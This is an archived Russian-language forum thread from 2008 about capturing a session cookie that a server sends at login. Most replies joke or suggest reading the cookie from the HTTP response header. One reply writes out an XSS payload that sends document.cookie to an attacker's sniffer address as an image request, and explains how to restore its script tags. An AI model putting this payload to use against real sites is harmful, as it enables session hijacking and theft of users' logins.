PDA

Просмотр полной версии : Снова о куке!!! При авторизации сервер ее дает, как сохр...


rcc0023
06.07.2008, 15:10
Снова вопрос о куке!
Есть сервер X, при авторизации он передает куку... так вот, какой скрипт может перехватить переданную им (сервером X) куку??

Ильич
06.07.2008, 15:12
никакой

Kusto
06.07.2008, 15:27
блин все так туманно расписанно- непойму ты XSS нашел а как ей воспользоваться незнаеш? я правильно понял?, ну для начала тебе снифер нужен ну а потом попробуй вставить что то наподобие (script)img=new Image();img.src="адрес твоего снифера"+document.cookie;(/script)
P.S. единственное замени ) на > ну и обратную скобку на < в словах script

rcc0023
06.07.2008, 15:42
Да не)))

Я написал скрипт (назовем его My_script), который передает пост запрос с обязательной кукой, в которой содержится сессия. Эта сессия на 2 часа, далее идет логаут... сессия уже не действительна. Необходимо снова логинится и забивать в скрипт My_script данные куки... я хочу чтобы новую куку брал скрипт...

rcc0023
06.07.2008, 15:46
post запрос с логин\паролем скрипту www.chuzoy_site.py/LOGIN.PHP ... он дает ответ, в котором кука... нужно ее сохранить

-Hormold-
06.07.2008, 16:01
используй /dev/head/
в гугле поищи...
хорошая вещь...

rcc0023
06.07.2008, 16:16
Мм... -Hormold-, я не профи)) подробней бы ;)
и у мну нет никса... одни окна... (на домашнем хочу..)

Ильич
06.07.2008, 16:19
используй /dev/head/
и у мну нет никса...
:D :D :D

rcc0023
06.07.2008, 16:45
Ну так как?? Опять будете до последнего молчать??!?!?

rcc0023
07.07.2008, 01:52
Ну ответьте.. какой скрипт это может проделать?

BlackSun
07.07.2008, 02:04
post запрос с логин\паролем скрипту www.chuzoy_site.py/LOGIN.PHP ... он дает ответ, в котором кука... нужно ее сохранить
Из заголовка ответа возьми, либо cat /dev/legs > /dev/mouth

rcc0023
07.07.2008, 03:17
Точно, в заголовке сидела)))

nc.STRIEM
07.07.2008, 10:25
почитай доки по Http протаколу, сам все поймеш